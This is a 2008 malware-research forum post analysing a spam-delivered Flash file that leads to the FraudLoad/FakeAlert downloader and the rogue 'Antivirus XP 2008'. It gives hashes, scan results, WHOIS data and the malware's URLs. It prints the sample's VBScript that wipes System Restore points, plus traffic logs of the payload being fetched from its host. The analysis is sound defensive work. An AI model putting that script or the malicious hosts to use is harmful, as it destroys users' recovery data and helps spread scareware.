B.I.S.S. Forums > FraudLoad goes SWF !

B.I.S.S. Forums > Malware Research Forum > Malware Playground

Kimberly

Aug 27 2008, 10:46 PM

Today's new spam is a MSN Featured Offers email linking to a malicious Flash file on a free image hosting website, ImageShack.

First of all a couple of references to read in case you are not familiar with the different aspects of this type of spam and redirects through Flash files.

Additional reading: about any topic prefixed with the word "spam".

Subject

Official Update 2008!

Body

Free Update Windows XP,Vista

Hovering over Free Update Windows XP,Vista reveals us that we will be taken to a Flash file by clicking on the link. Uhmm ... a strange way to update your OS isn't it?

If you click on the link - something that you should NOT do - a new Internet Explorer window will open up, display the Flash file and we will be prompted to download install.exe. If the information bar is active, you'll get a warning.

<h4>

Inside the Flash file

</h4>
The malicious Flash file contains a link to 89.187.49.18/install.exe and uses ActionScript 3.0 packages.

Below is a general overview of it's construction.

The 3 text fields contain some very strange strings.

Textbox acts as a "listbox" and contains line1 & line2 & line3. They are visible in the animation.

A treeview is sometimes better to show depencies.

File details.

File size: 3240 bytes
MD5...: ed104e3720cdcec8c3b702a9c0989ccb
SHA1..: 689af13492c1d13bac751940fb9a599e43cbf3db
SHA256: d17ecf4ea0dd52a13495c2584eb765c32b5c7931d21f137f1a63401479ca1df5
PEiD..: -
TrID..: File type identification
Macromedia Flash Player Compressed Movie (100.0%)
PEInfo: -
packers (Kaspersky): Swf2Swc

scan result: 0/36 (0%)

<h4>

install.exe

</h4>
Filename: install.exe

Additional information
File size: 203776 bytes
MD5...: 0f44ed00c0b67d9e5062b8e2c3574345
SHA1..: 4d9b42bbd950ea0c253a483ea2db3f888055c1c6
SHA256: e5885411c5ab7dbf2846b3b0606f6b294bbc9203ec8065d13560470ceab07c07
PEiD..: -

QUOTE
File install.exe received on 08.27.2008 22:10:29 (CET)
AhnLab-V3 2008.8.27.1 2008.08.27 -
AntiVir 7.8.1.23 2008.08.27 -
Authentium 5.1.0.4 2008.08.27 -
Avast 4.8.1195.0 2008.08.27 -
AVG 8.0.0.161 2008.08.27 Downloader.FraudLoad.N
BitDefender 7.2 2008.08.27 Trojan.FakeAlert.ACE
CAT-QuickHeal 9.50 2008.08.26 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.08.27 -
DrWeb 4.44.0.09170 2008.08.27 Trojan.Packed.619
eSafe 7.0.17.0 2008.08.26 Suspicious File
eTrust-Vet 31.6.6052 2008.08.27 -
Ewido 4.0 2008.08.27 -
F-Prot 4.4.4.56 2008.08.27 -
F-Secure 7.60.13501.0 2008.08.27 -
Fortinet 3.14.0.0 2008.08.27 -
GData 19 2008.08.27 -
Ikarus T3.1.1.34.0 2008.08.27 -
K7AntiVirus 7.10.428 2008.08.25 -
Kaspersky 7.0.0.125 2008.08.27 -
McAfee 5371 2008.08.27 Downloader-ASH.gen.b
Microsoft 1.3807 2008.08.25 -
NOD32v2 3393 2008.08.27 a variant of Win32/Kryptik.E
Norman 5.80.02 2008.08.27 W32/Tibs.gen225
Panda 9.0.0.4 2008.08.27 -
PCTools 4.4.2.0 2008.08.27 -
Prevx1 V2 2008.08.27 Malicious Software
Rising 20.59.21.00 2008.08.27 -
Sophos 4.33.0 2008.08.27 -
Sunbelt 3.1.1582.1 2008.08.26 -
Symantec 10 2008.08.27 -
TheHacker 6.3.0.6.060 2008.08.23 -
TrendMicro 8.700.0.1004 2008.08.27 -
VBA32 3.12.8.4 2008.08.27 -
ViRobot 2008.8.27.1352 2008.08.27 -
VirusBuster 4.5.11.0 2008.08.27 -
Webwasher-Gateway 6.6.2 2008.08.27 -

<h4>

Technical details

</h4>
FraudLoad / FakeAlert.

Changes the wallpaper and screensaver on the computer. Permissions for the user to change the background image and the screensaver are disabled also.
Disables the Windows System Restore feature which deletes currently existing restore points. It then recreates another restore point by re-enabling the Windows System Restore feature. This is performed by a vbs script.
Installs a rogue anti-spyware application.

For detailed registry and files changes, please refer to this topic.

<h4>

Notes

</h4>
Upon execution install.exe immediately changes your background to a new wallpaper.

Windows Scripting is then launched to disable and re-enable System Restore in order to clear all previous restore points and create a new one.

CODE
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.Disable("")
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.Enable("")
CONST DEVICE_DRIVER_INSTALL = 10

CONST BEGIN_SYSTEM_CHANGE = 100
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.CreateRestorePoint _
    ("Last good restore point", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)
If (errResults <> 0) then
    WScript.Sleep 10000
End if
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\default")
Set objItem = objWMIService.Get("SystemRestore")
errResults = objItem.CreateRestorePoint _
    ("Last good restore point", DEVICE_DRIVER_INSTALL, BEGIN_SYSTEM_CHANGE)

Internet acces is requested in order to download additional components. The file will be saved as %Temp%\.ttc.tmp

CODE
GET /images/1219869555/d869c6f2f70dd3dcf64b047f99f46be8/d0d85412-d5b1-4376-9071-9f24cc1401f7.gif HTTP/1.1
Range: bytes=0-
User-Agent: Internet Explorer
Host: avxp-2008.net

HTTP/1.1 302 Found
Server: nginx/0.6.26
Date: Wed, 27 Aug 2008 20:40:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Location: http://stat.avxp-2008.net/soft3/common/16.gif
Content-Length: 0
----------------------------------------------------------------------------
GET /soft3/common/16.gif HTTP/1.1
User-Agent: Internet Explorer
Connection: Keep-Alive
Host: stat.avxp-2008.net

HTTP/1.1 206 Partial Content
Server: nginx/0.6.26
Date: Wed, 27 Aug 2008 20:40:29 GMT
Content-Type: image/gif
Content-Length: 1619081
Last-Modified: Wed, 27 Aug 2008 20:19:20 GMT
Connection: keep-alive

.ttc.tmp will be launched by install.exe with some commandline parameters.

CODE
22:39:58 [EXECUTION] "c:\documents and settings\kly\local settings\temp\.ttc.tmp" was allowed to run
[EXECUTION] Started by "c:\documents and settings\kly\desktop\install.exe" [760]
[EXECUTION] Commandline - [ "c:\documents and settings\kly\local settings\temp\.ttc.tmp" /aid="d869c6f2f70dd3dcf64b047f99f46be8" /dom="http://avxp-2008.net" ]

An Eula will be displayed for Antivirus XP 2008 but as seen on the image you can't cancel install or refuse the license agreement. You can't even close the window.

Another vbs script will pin 2 Antivirus XP 2008 shortcuts to the startmenu. Antivirus XP 2008 is now "installed" and the program will perform an initial scan.

Antivirus XP 2008 will periodically check for "database updates". Notice how AntivirXP08 has been appended to the default User-Agent string.

CODE
GET /updates/check.html HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AntivirXP08)
Host: www.avxp-2008.net
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.6.26
Date: Wed, 27 Aug 2008 20:49:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Last-Modified: Wed, 20 Aug 2008 11:18:32 GMT
ETag: "de9446-57-5d547200"
Accept-Ranges: bytes
Content-Length: 87

<pre>
APP_VER=3.5.1.20
DATABASE_VER=3.5.1.20
SIGNATURES=60532
DATE=17/12/07
</pre>

Of course the victim will be constantly nagged to purchase the scam and it may even display fake Insecure Browsing messages.

----------------------------------------------------------------
IP details :
----------------------------------------------------------------

-----------------------------
install.exe | 89.187.49.18
-----------------------------

inetnum: 89.187.49.0 - 89.187.49.255
netname: WHS-49
org: ORG-KL46-RIPE
descr: Web hosting service
country: MD

QUOTE

FTP - 21 220 localhost.localdomain FTP server (Version 6.00LS) ready.

SMTP - 25 Error: TimedOut
HTTP - 80 HTTP/1.1 200 OK
Date: Thu, 28 Aug 2008 10:09:16 GMT
Server: Apache/2.2
Last-Modified: Sun, 25 Nov 2007 15:28:47 GMT
ETag: "1088018-e38-80fb49c0"
Accept-Ranges: bytes
Content-Length: 3640
Connection: close
Content-Type: text/html

-----------------------------

Avxp-2008.net
Axpfixer.com
Antivirusonline-2009.com

78.159.96.17

-----------------------------

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: AVXP-2008.NET

Domain servers in listed order:
ns7.avxp-2008.net
ns11.avxp-2008.net
ns10.avxp-2008.net
Administrative Contact:
AntiVirXP inc
Lynn P. Brewer .info@avxp-2008.net

-----------------------------

ns1.avxp-2008.net = [ 78.159.96.17 ]
ns2.avxp-2008.net = [ 78.159.96.17 ]
ns10.avxp-2008.net = [ 78.159.96.17 ]
ns11.avxp-2008.net = [ 78.159.96.16 ]

78.159.96.17 = [ 78-159-96-17.internetserviceteam.com ]

inetnum: 78.159.96.0 - 78.159.103.255
netname: NETDIRECT-NET
descr: netdirekt e.K.
remarks: INFRA-AW
country: DE

-----------------------------

ns7.avxp-2008.net = [ 85.17.45.51 ]

85.17.45.51 = [ hosted-by.leaseweb.com ]

inetnum: 85.17.45.0 - 85.17.45.255
netname: LEASEWEB
descr: LeaseWeb
descr: 1090BB AMSTERDAM
descr: Netherlands
remarks: INFRA-AW
country: NL

-----------------------------

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.